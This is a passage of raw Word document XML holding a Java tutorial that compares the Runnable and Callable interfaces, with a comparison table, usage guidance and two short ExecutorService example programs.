                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Execution Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3548299D"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No result is returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C71358B"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Returns a result, typically using Future.get() to retrieve the result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="68BAEB97" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75849D95"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Used in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B9E4CC5"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Used when task doesn't need a result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02F41449"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Used when the task needs to return a result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="383CAD07" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65ECED1A"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Usage in ExecutorService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D50E8D8"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Submitted to an ExecutorService that doesn't need results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34017D9D"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Submitted to an ExecutorService that provides the result via Future</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="334A5983" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AC6B9D7"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Return Type for Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D42DD9"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The run() method has no return type (void)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AEF8EE9"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The call() method returns a value of type V</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="41C52223" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4658BA66"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54F3C3A7"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Runnable task = () -&gt; { System.out.println("Task executed"); };</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26A5CD63"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Callable&lt;Integer&gt; task = () -&gt; { return 42; };</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42BB6405" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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Key Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F8DC59" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Return Type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A1594" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable: The run() method in the Runnable interface does not return any result. It is defined as void run().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288AA10A" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Callable: The call() method in the Callable interface returns a result. It returns an object of type V, allowing you to capture the result of the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6950C10A" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0A969D" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable: It cannot throw checked exceptions. If a Runnable task throws an exception, it is unchecked (a RuntimeException).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6340FA25" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Callable: It allows throwing checked exceptions in its call() method. This gives Callable more flexibility to handle errors during task execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC959F9" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D7AF4" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable: When a Runnable task is executed, it is submitted using ExecutorService.submit() or Executor.execute(), but it doesn't return any result, only executes the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B29FC8" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Callable: A Callable task is also submitted using ExecutorService.submit(), but it returns a Future object. The Future object can be used to obtain the result of the task once it has been completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA89DE2" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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When to Use Each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BDEC53" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Runnable when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E20047E" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You don’t need a result from the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D593589" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You are executing a task that does not throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267817E" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The task is for side effects (e.g., updating some shared resource or performing an action) and doesn’t need to return any data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DF8581" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The task can be executed by a thread without needing to report back to the caller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651191AF"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0ECF06" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Printing logs, updating a UI, processing a file, or triggering an action like sending an email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928FAF6" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Callable when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44308ADB" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You need the task to return a result after execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154BC515" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The task may throw checked exceptions that need to be handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D48216" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You need to retrieve the result of the task after it completes, which can be done by calling Future.get().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718F3618"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1B2816" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Running a task that computes a result, such as performing complex calculations or fetching data from a database, where the result is required for further processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDA717" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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Example Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5FE1B0" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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Runnable Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65620FF3"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import java.util.concurrent.ExecutorService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0AD682"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import java.util.concurrent.Executors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D43563" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6810C9B0"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public class RunnableExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67166404"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107D527"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ExecutorService executorService = Executors.newFixedThreadPool(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048921FF"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1BE9EB89"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Runnable task = () -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FDAD93"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Runnable Task is being executed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8D331"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39CAE321"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37784B25"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executorService.submit(task);  // No result returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7A256"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7D4B7330"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executorService.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528EF03F"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50A38BCF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3765C2" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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Callable Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414789FC"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import java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70855F76" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47AC26AE"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public class CallableExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3254C1F2"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static void main(String[] args) throws InterruptedException, ExecutionException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A1277E"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ExecutorService executorService = Executors.newFixedThreadPool(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59751105"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7B1ADD95"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Callable&lt;Integer&gt; task = () -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B38521"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Callable Task is being executed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12072153"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return 42;  // Return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36963AEE"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3C5F84C4"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377537E8"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Future&lt;Integer&gt; future = executorService.submit(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE9DEB"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Integer result = future.get();  // Get the result from the Callable task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D03A9"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78F22237"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Result from Callable Task: " + result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C177E2E"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2C50A1A0"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executorService.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5534CB"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5BD71607"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574F2EB" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5297FC2F" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
